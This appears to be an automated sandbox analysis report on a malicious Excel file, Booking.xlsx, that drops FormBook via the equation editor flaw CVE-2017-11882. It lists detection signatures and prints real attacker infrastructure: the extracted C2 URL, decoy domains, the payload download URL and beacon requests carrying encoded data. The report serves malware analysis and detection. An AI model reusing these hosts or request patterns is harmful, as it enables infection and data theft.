Analysis Report Booking.xlsx

Overview

General Information

Sample Name: Booking.xlsx
Analysis ID: 356846
MD5: 889b85a1924c2498073da4f94d312cd0
SHA1: 0384c76d8fcc5ca57b63a21a169198b8dbc1f31b
SHA256: 3d3fc5984e22957b53d18bd58555c96b4895f4436f9ce1fed5dc2fb63878720c
Tags: FormbookMaerskVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Connects to a URL shortener service
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite Avira URL Cloud: Label: malware
Found malware configuration
Source: 6.2.vbc.exe.400000.0.unpack Malware Configuration Extractor: FormBook {"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1] ReversingLabs: Detection: 15%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 15%
Multi AV Scanner detection for submitted file
Source: Booking.xlsx ReversingLabs: Detection: 23%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: netstat.pdb source: vbc.exe, 00000006.00000002.2218174024.0000000000859000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE

Software Vulnerabilities:

barindex
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 36MB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 4_2_00892CBC
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 4_2_00892CC8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_008990D1
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_008990E0
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: ow.ly
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 54.67.120.65:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 54.67.120.65:80

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.evolvekitchendesign.com/ffw/
Connects to a URL shortener service
Source: unknown DNS query: name: ow.ly
Source: unknown DNS query: name: ow.ly
Uses netstat to query active network connections and open ports
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Feb 2021 16:47:41 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0Last-Modified: Tue, 23 Feb 2021 13:00:36 GMTETag: "6fe00-5bc0081234afa"Accept-Ranges: bytesContent-Length: 458240Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 74 fc 34 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e8 06 00 00 14 00 00 00 00 00 00 86 06 07 00 00 20 00 00 00 20 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 06 07 00 4f 00 00 00 00 20 07 00 2c 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c e6 06 00 00 20 00 00 00 e8 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 11 00 00 00 20 07 00 00 12 00 00 00 ea 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 07 00 00 02 00 00 00 fc 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 06 07 00 00 00 00 00 48 00 00 00 02 00 05 00 ec b8 00 00 f0 40 01 00 03 00 00 00 6e 00 00 06 dc f9 01 00 58 0c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 67 01 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ffw/?Op=Z6Ad&TD=pm4+eduCQwER/qZxnrPJuw4xUSDN7aZmpWq/zCgzL/Y307WdsenSSF4f4mH0J/evCd5k6w== HTTP/1.1Host: www.jtelitetraining.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ffw/?TD=4mSI10Yn2rl+AeK9/MktY46XOThf9FEOxx944hcMIRU/zkocuFA5YRhQIs2qWJDYV02QxA==&Op=Z6Ad HTTP/1.1Host: www.tiwapay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.141.138.118 103.141.138.118
Source: Joe Sandbox View IP Address: 160.153.136.3 160.153.136.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /6gT330rxT5U HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ow.lyConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /findoc/svchost.exe?platform=hootsuite HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: thdyworkfinerainbotm.dns.army
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56E156B3.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /6gT330rxT5U HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ow.lyConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /findoc/svchost.exe?platform=hootsuite HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: thdyworkfinerainbotm.dns.army
Source: global traffic HTTP traffic detected: GET /ffw/?Op=Z6Ad&TD=pm4+eduCQwER/qZxnrPJuw4xUSDN7aZmpWq/zCgzL/Y307WdsenSSF4f4mH0J/evCd5k6w== HTTP/1.1Host: www.jtelitetraining.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ffw/?TD=4mSI10Yn2rl+AeK9/MktY46XOThf9FEOxx944hcMIRU/zkocuFA5YRhQIs2qWJDYV02QxA==&Op=Z6Ad HTTP/1.1Host: www.tiwapay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown DNS traffic detected: queries for: ow.ly
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 16:49:02 GMTServer: Apache/2.4.46 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2194501309.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000007.00000000.2192124116.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.2192124116.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: vbc.exe, vbc.exe, 00000005.00000000.2173313353.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2218672810.0000000000CF2000.00000020.00020000.sdmp String found in binary or memory: http://qunect.com/download/QuNect.exe
Source: vbc.exe, 00000004.00000002.2181150885.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2173313353.0000000000CF2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2218672810.0000000000CF2000.00000020.00020000.sdmp String found in binary or memory: http://qunect.com/download/QuNect.exeMOperation
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000007.00000000.2204348275.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
